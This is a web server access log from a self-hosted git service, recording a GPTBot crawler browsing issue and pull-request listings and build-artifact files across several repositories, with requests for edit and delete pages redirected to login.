git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=source" [Client 74.7.227.38] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:18:43:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:43:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:43:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:43:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:18:43:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:18:43:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:43:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:18:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:43:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:43:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:44:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10250] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 10595] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" -[17/Feb/2026:18:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11160] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11156] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9830] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs" -[17/Feb/2026:18:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9840] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 